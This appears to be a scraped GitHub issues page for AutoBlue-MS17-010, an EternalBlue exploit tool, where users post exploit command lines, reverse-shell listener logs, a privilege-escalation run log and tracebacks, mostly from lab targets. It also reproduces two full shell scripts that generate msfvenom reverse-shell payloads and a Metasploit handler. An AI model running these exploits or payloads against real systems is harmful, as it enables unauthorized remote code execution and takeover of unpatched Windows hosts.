3ndg4me / autoblue-ms17-010 Goto Github PK
View Code? Open in Web Editor NEWThis is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010
License: MIT License
This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010
License: MIT License
Hi,
I'm having some issues with this code.
I tried using it and it does connect back to my attacking box however there is no shell (cmd.exe)
I was expecting something like this:
C:\Windows\system32>
I tried it against several machines, mostly Windows 7 & Server 2008 which I knew to be vulnerable.
I even tried inputting a different numGroomConn number but with no visible results.
Any thoughts?
python eternalblue_checker.py 10.x.x.x
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_OBJECT_NAME_NOT_FOUND
python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.x.x.x.
Ncat: Connection from 10.x.x.x:49179.
python eternalblue_checker.py 10.x.x.x
Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: Ok (64 bit)
netlogon: Ok (64 bit)
lsarpc: Ok (64 bit)
browser: STATUS_ACCESS_DENIED
python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.x.x.x] 49218
python eternalblue_checker.py 10.x.x.x
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
nc -nlvp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.x.x.x.
Ncat: Connection from 10.x.x.x:49157.
Hello,
I am having an issue with the Relevant CTF (https://tryhackme.com/room/relevant) using AutoBlue. I see some walkthroughs using it successfully - so the command should work.
As requested, I have filed this as a new issue, as this indeed does occur in latest impacket, latest Python, in a clean Miniconda docker environment (as well as on my host, Kali Linux 2021.1).
The following steps will reproduce this issue:
docker run -i -t continuumio/miniconda3 /bin/bash
conda create -n py397 python=3.9.7
conda activate py397
pip install git+https://github.com/SecureAuthCorp/impacket
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
python3 zzz_exploit.py 'RELEVANT/Bill:[email protected]'
Yielding the following results:
[*] Target OS: Windows Server 2016 Standard Evaluation 14393
[-] Could not open /usr/share/metasploit-framework/data/wordlists/named_pipes.txt, trying hardcoded values
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Traceback (most recent call last):
File "/AutoBlue-MS17-010/zzz_exploit.py", line 1112, in <module>
main()
File "/AutoBlue-MS17-010/zzz_exploit.py", line 1109, in main
exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
File "/AutoBlue-MS17-010/zzz_exploit.py", line 980, in exploit
if not info['method'](conn, pipe_name, info):
File "/AutoBlue-MS17-010/zzz_exploit.py", line 469, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "/AutoBlue-MS17-010/zzz_exploit.py", line 313, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "/AutoBlue-MS17-010/mysmb.py", line 375, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/AutoBlue-MS17-010/mysmb.py", line 83, in _put_trans_data
transData += (b'\x00' * padLen) + data
TypeError: can't concat str to bytes
Thank you for your time.
hello,what's wrong with this,my python is 3.7.2,and my impacket is the latest
(py3) C:\Users\admin\Downloads\AutoBlue-MS17-010-master>python zzz_exploit.py test:[email protected]
[*] Target OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[-] Could not open /usr/share/metasploit-framework/data/wordlists/named_pipes.txt, trying hardcoded values
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Traceback (most recent call last):
File "zzz_exploit.py", line 1112, in <module>
main()
File "zzz_exploit.py", line 1109, in main
exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
File "zzz_exploit.py", line 980, in exploit
if not info['method'](conn, pipe_name, info):
File "zzz_exploit.py", line 469, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "zzz_exploit.py", line 313, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "C:\Users\admin\Downloads\AutoBlue-MS17-010-master\mysmb.py", line 375, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "C:\Users\admin\Downloads\AutoBlue-MS17-010-master\mysmb.py", line 83, in _put_trans_data
transData += (b'\x00' * padLen) + data
TypeError: can't concat str to bytes
eython eternalblue_checker.py 96.126..
[] exec: python eternalblue_checker.py 96.126..*
Traceback (most recent call last):
File "eternalblue_checker.py", line 42, in
conn.login(USERNAME, PASSWORD)
File "/root/autoblue/mysmb.py", line 152, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3340, in login
self.login_extended(user, password, domain, lmhash, nthash, use_ntlmv2 = True)
File "/root/autoblue/mysmb.py", line 160, in login_extended
Target OS:
smb.SMB.login_extended(self, user, password, domain, lmhash, nthash, use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3250, in login_extended
type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, respToken['ResponseToken'], user, password, domain, lmhash, nthash, use_ntlmv2 = use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 618, in getNTLMSSPType3
ntResponse, lmResponse, sessionBaseKey = computeResponse(ntlmChallenge['flags'], ntlmChallenge['challenge'], clientChallenge, serverName, domain, user, password, lmhash, nthash, use_ntlmv2 )
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 36, in computeResponse
lmhash, nthash, use_ntlmv2=use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 899, in computeResponseNTLMv2
av_pairs = AV_PAIRS(serverName)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 206, in init
self.fromString(data)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 229, in fromString
fType = struct.unpack('<H',tInfo[:struct.calcsize('<H')]
Help!!!!!!
I'd like to know how to generate bind shell payload, please.
./shell_prep.sh
.-;;-.
'-..-'| || |
'-..-'|.-;;-.|
'-..-'| || |
'-..-'|.-''-.|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
./shell_prep.sh: 18: ./shell_prep.sh: Syntax error: "(" unexpected (expecting "then")
I am trying to use the exploit on my Win7 PC. I dont know how to setup. Which version of python should i use? Thanks
I got this error:
shellcode size: 2307
numGroomConn: 13
Target OS: Windows 10 Pro 10240
got good NT Trans response
got good NT Trans response
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status for nx: INVALID_PARAMETER
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 984, in non_polling_read
received = self._sock.recv(bytes_left)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
TimeoutError: timed out
The eternal_checker.py has also detected that the version of windows 10 that im exploiting has not been patched.
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
./shell_prep.sh: 18: ./shell_prep.sh: Syntax error: "(" unexpected (expecting "then")
Hello, I have an issue with module name pyasn1.type.univ
when running python2 and module name impacket
when running python3.
I'm running eternalblue_exploit7.py
file and I don't know why it's always showing that error, and I am already stuck on how to fix the issues. My OS is Kali Linux. Can you help me solve this issue?
$ python eternalblue_exploit10.py 172.16.182.130 shellcode/sc_all.bin 1 ⨯
Traceback (most recent call last):
File "eternalblue_exploit10.py", line 2, in <module>
from impacket import smb, ntlm
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 49, in <module>
from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ
$ python3 eternalblue_exploit10.py 172.16.182.130 shellcode/sc_all.bin 1 ⨯
Traceback (most recent call last):
File "/home/avv-kali/Documents/Offensive Security/Tools/Exploitation/AutoBlue-MS17-010/eternalblue_exploit10.py", line 2, in <module>
from impacket import smb, ntlm
ModuleNotFoundError: No module named 'impacket'
root@kali:/AutoBlue-MS17-010# python eternal_checker.py 192.168.0.101
Traceback (most recent call last):
File "eternal_checker.py", line 89, in
main()
File "eternal_checker.py", line 66, in main
conn = MYSMB(options.target_ip, int(options.port))
File "/AutoBlue-MS17-010/mysmb.py", line 122, in init
smb.SMB.init(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2437, in init
self.neg_session()
File "/AutoBlue-MS17-010/mysmb.py", line 178, in neg_session
smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2657, in neg_session
smb = self.recvSMB()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2521, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 997, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 983, in non_polling_read
raise NetBIOSError('Error occurs while reading from remote', ERRCLASS_OS, ex[0])
impacket.nmb.NetBIOSError: Error occurs while reading from remote(104)
From kali, I am trying to use the eternalblue_exploit10.py, I tried on several W10 machines (all not patched according to eternal_checker.py), and after I run the command the W10 VM crashes.
Target machine Microsoft Windows Version 10.0 (Build 10240)
Here's the ouput of the command in my Kali VM:
`python3 eternalblue_exploit10.py 192.168.202.137 shellcode/sc_all.bin
shellcode size: 2307
numGroomConn: 13
Target OS: Windows 10 Home 10240
got good NT Trans response
got good NT Trans response
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status for nx: INVALID_PARAMETER
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 984, in non_polling_read
received = self._sock.recv(bytes_left)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
TimeoutError: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/kali/EternalBlue/AutoBlue-MS17-010/eternalblue_exploit10.py", line 599, in
exploit(TARGET, sc, numGroomConn)
File "/home/kali/EternalBlue/AutoBlue-MS17-010/eternalblue_exploit10.py", line 570, in exploit
nxconn.disconnect_tree(tid)
File "/usr/lib/python3/dist-package.py", line 2886, in disconnect_tree
self.recvSMB()
File "/usr/lib/python3/dist-package.py", line 2592, in recvSMB
r = self.sess.recv_packet(self.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 915, in recv_packet
data = self.__read(timeout)
^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 1002, in __read
data = self.read_function(4, time
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 986, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETB with the remote host timed out.
`
I would like to enable this in the file instead of the shell
smbConn = conn.get_smbconnection()
smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe')
service_exec(conn, r'c:\test.exe')
Is this possible because I am testing with a WinXP host and scripts do not work against that machine.
I'm sorry I this post is not appropriate as an issue. I can find any sources how to use this tool and generate bindshell instead of reverse shell.
am learning to exploit without metasploit. I came across autoblue when attempting to do so in HTB-blue.
When I do python eternal_checker.py
i get errors
Line 427 in mysmb.py:
except Exception as e:
Line 567 in mysmb.py
except Exception, e:
I am stuck at how to best use it, py2 or py3. i tried using py2 and
msf5
after python eternalblue_exploit7.py [IP:XX:XX:XX] shellcode/sc_all.bin
Help please
My Kali Release: 2021.1
when I run the command, I got the error message below:
┌──(kali㉿kali)-[~/blue]
└─$ python3 ./eternalblue_exploit10.py 10.10.10.40 ./shellcode/sc_all.bin
Traceback (most recent call last):
File "/home/kali/blue/./eternalblue_exploit10.py", line 74, in
ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x260 # with these fea, ntfea size is 0x1c80
TypeError: can't concat str to byt
I have run the command line below before running it.
┌──(kali㉿kali)-[~/blue]
└─$ pip install -r requirements.txt 1 ⨯
Requirement already satisfied: impacket in /usr/local/lib/python3.9/dist-packages/impacket-0.9.23-py3.9.egg (from -r requirements.txt (line 1)) (0.9.23)
Requirement already satisfied: chardet in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (4.0.0)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.1.2)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.18.2)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.9.3)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (20.0.1)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.9.7)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.15.0)
I thought it is related to python version issue, but don't know how to fix it. As you mentioned it support Python3, would you please have a look? I am new to python :(
HTB Blue box https://app.hackthebox.eu/machines/Blue
Computer : HARIS-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
I need to run use auxiliary/scanner/smb/pipe_auditor
before use multi_hadnler
.
Also, it might be the reason why non-meterpreter shells not working. Cause there is not pipe set.
python eternalblue_checker.py xxx.xxx.xxx.xxx Target OS: Traceback (most recent call last): File "eternalblue_checker.py", line 42, in <module> conn.login(USERNAME, PASSWORD) File "/root/AutoBlue-MS17-010/mysmb.py", line 152, in login smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback) TypeError: login() takes at most 6 arguments (7 given)
Hi,
I'm doing my pentesting via a locally installed Pi that offers an OpenVPN connection for me. The Pi is in the LAN of the client and I use that in combination with a Kali install that connects via VPN.
I don't think I can compile the shellcode on the Pi, so I ded that on Kali. I cannot start the listener on Kali however,, because it has no IP on the client's LAN. It has a TUN interface in another range.
Can the code be changed so I can use a listener on another host?
Cheers,
BC
I made the following changes to improve portability, readability, and organization:
Replaced Double Square Brackets with Single Square Brackets:
[[ ... ]]
with [ ... ]
to ensure compatibility with various shell interpreters.Simplified Nested If Statements:
if
statements for better readability and clarity.Used -p
Option with read
Command:
-p
option with the read
command to display a prompt message directly on the same line. 💻Consolidated Common Code:
#!/bin/bash
cat << "EOF"
__
/,-
||)
\\_, )
`--'
EOF
echo Eternal Blue Metasploit Listener
echo
echo LHOST for reverse connection:
read ip
echo LPORT for x64 reverse connection:
read portOne
echo LPORT for x86 reverse connection:
read portTwo
echo Enter 0 for meterpreter shell or 1 for regular cmd shell:
read cmd
# Changes made for better portability and clarity
if [ "$cmd" -eq 0 ]; then
read -p "Type 0 if this is a staged payload or 1 if it is for a stageless payload: " staged
if [ "$staged" -eq 0 ]; then
echo "Starting listener (staged)..."
touch config.rc
echo "use exploit/multi/handler" > config.rc
echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> config.rc
echo "set LHOST $ip" >> config.rc
echo "set LPORT $portOne" >> config.rc
echo "set ExitOnSession false" >> config.rc
echo "set EXITFUNC thread" >> config.rc
echo "exploit -j" >> config.rc
echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> config.rc
echo "set LPORT $portTwo" >> config.rc
echo "exploit -j" >> config.rc
/etc/init.d/postgresql start
msfconsole -r config.rc
/etc/init.d/postgresql stop
rm config.rc
elif [ "$staged" -eq 1 ]; then
echo "Starting listener (stageless)..."
touch config.rc
echo "use exploit/multi/handler" > config.rc
echo "set PAYLOAD windows/x64/meterpreter_reverse_tcp" >> config.rc
echo "set LHOST $ip" >> config.rc
echo "set LPORT $portOne" >> config.rc
echo "set ExitOnSession false" >> config.rc
echo "set EXITFUNC thread" >> config.rc
echo "exploit -j" >> config.rc
echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> config.rc
echo "set LPORT $portTwo" >> config.rc
echo "exploit -j" >> config.rc
/etc/init.d/postgresql start
msfconsole -r config.rc
/etc/init.d/postgresql stop
rm config.rc
fi
elif [ "$cmd" -eq 1 ]; then
read -p "Type 0 if this is a staged payload or 1 if it is for a stageless payload: " staged
if [ "$staged" -eq 0 ]; then
echo "Starting listener (staged)..."
touch config.rc
echo "use exploit/multi/handler" > config.rc
echo "set PAYLOAD windows/x64/shell/reverse_tcp" >> config.rc
echo "set LHOST $ip" >> config.rc
echo "set LPORT $portOne" >> config.rc
echo "set ExitOnSession false" >> config.rc
echo "set EXITFUNC thread" >> config.rc
echo "exploit -j" >> config.rc
echo "set PAYLOAD windows/shell/reverse_tcp" >> config.rc
echo "set LPORT $portTwo" >> config.rc
echo "exploit -j" >> config.rc
/etc/init.d/postgresql start
msfconsole -r config.rc
/etc/init.d/postgresql stop
rm config.rc
elif [ "$staged" -eq 1 ]; then
echo "Starting listener (stageless)..."
touch config.rc
echo "use exploit/multi/handler" > config.rc
echo "set PAYLOAD windows/x64/shell_reverse_tcp" >> config.rc
echo "set LHOST $ip" >> config.rc
echo "set LPORT $portOne" >> config.rc
echo "set ExitOnSession false" >> config.rc
echo "set EXITFUNC thread" >> config.rc
echo "exploit -j" >> config.rc
echo "set PAYLOAD windows/shell/reverse_tcp" >> config.rc
echo "set LPORT $portTwo" >> config.rc
echo "exploit -j" >> config.rc
/etc/init.d/postgresql start
msfconsole -r config.rc
/etc/init.d/postgresql stop
rm config.rc
fi
else
echo "Invalid option...exiting..."
fi
/home/w/Do/H/N/AutoBlue-MS17-010 on master !8 ?1 ✔ ▓▒░ python eternal_checker.py 10.10.10.178
Traceback (most recent call last):
File "eternal_checker.py", line 89, in
main()
File "eternal_checker.py", line 66, in main
conn = MYSMB(options.target_ip, int(options.port))
File "/home/warmachine/Documentos/HTB/Nest/AutoBlue-MS17-010/mysmb.py", line 122, in init
smb.SMB.init(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2427, in init
self.neg_session()
File "/home/warmachine/Documentos/HTB/Nest/AutoBlue-MS17-010/mysmb.py", line 178, in neg_session
smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2642, in neg_session
smb = self.recvSMB()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2506, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 996, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 983, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer
If I run shell_prep.sh I get a compilation error
`
./shell_prep.sh
.-;;-.
'-..-'| || |
'-..-'|.-;;-.|
'-..-'| || |
'-..-'|.-''-.|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
eternalblue_kshellcode_x64.asm: fatal: unable to open output file sc_x64_kernel.bin'
but if I run shell_prep.sh with sudo permissions it does not give me problems
`
sudo ./shell_prep.sh
.-;;-.
'-..-'| || |
'-..-'|.-;;-.|
'-..-'| || |
'-..-'|.-''-.|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
n
Okay cool, make sure you merge your own shellcode properly :)
DONE
`
After doin every steps perfectly, i come up with this error "No route to host". What is the solution for this??
I've confirmed the target is vulnerable (blue - HTB).
I've created the shellcode without errors.
I've started the listener without errors.
I get the following error when attempting the eternalblue exploit.
root@host/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin 12
shellcode size: 2203
numGroomConn: 12
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
Any suggestions?
I am running this against Blue on HTB. I keep getting the following error. I am able to ping the host. I have tried restarting the machine multiple times. I am on kali 2021.3-vmware-amd64.
python3 eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2205
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 984, in non_polling_read
received = self._sock.recv(bytes_left)
socket.timeout: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/root/hackthebox/blue/AutoBlue-MS17-010/eternalblue_exploit7.py", line 563, in <module>
exploit(TARGET, sc, numGroomConn)
File "/root/hackthebox/blue/AutoBlue-MS17-010/eternalblue_exploit7.py", line 544, in exploit
conn.disconnect_tree(tid)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/smb.py", line 2886, in disconnect_tree
self.recvSMB()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/smb.py", line 2592, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 915, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 1002, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 986, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
Got this error, tried on many different ports still same issue.
Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444)
I have no issues using Metasploit (ms17_010_eternalblue) alone to perform the same type of attack. This works.
Several modifications have been implemented to enhance portability and resolve compatibility issues associated with the use of double brackets [[ ... ]]
.
Compatibility with Different Shell Interpreters: Replaced double brackets [[ ... ]]
with single brackets [ ... ]
to ensure compatibility with various shell interpreters.
Code Simplification: Streamlined certain sections of the code to enhance readability and organization.
Usage of -p
with the read
Command: Employed the -p
option with the read
command to display a prompt message directly on the same line. 💻
#!/bin/bash
set -e
cat << "EOF"
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
EOF
echo Eternal Blue Windows Shellcode Compiler
echo
echo Let\'s compile them windoos shellcodezzz
echo
echo Compiling x64 kernel shellcode
nasm -f bin eternalblue_kshellcode_x64.asm -o sc_x64_kernel.bin
echo 'Compiling x86 kernel shellcode'
nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin
echo kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? \(Y\/n\)
read genMSF
if [ "$genMSF" = "y" ] || [ "$genMSF" = "Y" ]; then
read -p "LHOST for reverse connection: " ip
read -p "LPORT you want x64 to listen on: " portOne
read -p "LPORT you want x86 to listen on: " portTwo
read -p "Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell: " cmd
if [ "$cmd" -eq 0 ]; then
read -p "Type 0 to generate a staged payload or 1 to generate a stageless payload: " staged
if [ "$staged" -eq 0 ]; then
echo "Generating x64 meterpreter shell (staged)..."
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
elif [ "$staged" -eq 1 ]; then
echo "Generating x64 meterpreter shell (stageless)..."
msfvenom -p windows/x64/meterpreter_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
else
echo "Invalid option...exiting..."
exit 1
fi
elif [ "$cmd" -eq 1 ]; then
read -p "Type 0 to generate a staged payload or 1 to generate a stageless payload: " staged
if [ "$staged" -eq 0 ]; then
echo "Generating x64 cmd shell (staged)..."
msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
elif [ "$staged" -eq 1 ]; then
echo "Generating x64 cmd shell (stageless)..."
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
else
echo "Invalid option...exiting..."
exit 1
fi
else
echo "Invalid option...exiting..."
exit 1
fi
echo "MERGING SHELLCODE WOOOO!!!"
cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
python3 eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
else
echo "Okay cool, make sure you merge your own shellcode properly :)"
fi
echo "DONE"
exit 0
thanks for your click
attack :kali 2021
be attacked : windows server 2012 r2
when i compile
python eternalblue_exploit8.py (windows server 2012 r2 's ip) reverse_shell.bin 500
Traceback (most recent call last):
File "/home/kali/desktop/eternalblue_exploit8.py", line 542, in
fp = open(sys.argv[2], 'rb')
^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: 'reverse_shell.bin'
how to solve it?
I use a translator and my english is poor , please forgive me if there are some errors
Any thoughts on why by running the python zzz_exploit.py x.x.x.x
becomes like this ?
[] Target OS: Windows 5.1
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x8171e930
SESSION: 0xe11493f0
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe1d8c030
Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!
RestrictedSids: 0xe1d60c30
RestrictedSidCount: 0x1f4
userAndGroupCount: 0x4c
userAndGroupsAddr: 0xe1d8c0b8
Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1d8c0b8
[] overwriting token UserAndGroups
[] have fun with the system smb session!
[-] got exception
CRITICAL:root:SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Done
python eternal_checker.py 192.168.0.102
Traceback (most recent call last):
File "eternal_checker.py", line 1, in
from mysmb import MYSMB
File "/home/kali/soft/AutoBlue-MS17-010/mysmb.py", line 3, in
from impacket import smb, smbconnection
ImportError: No module named impacket
pls help me. I had run: pip install impacket , but not working
Hi
I have tested it on vulnerable Windows 7 and Windows 2008 none of them worked:
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
no shell back in msf
Metasploit uses the following list of named pipes:
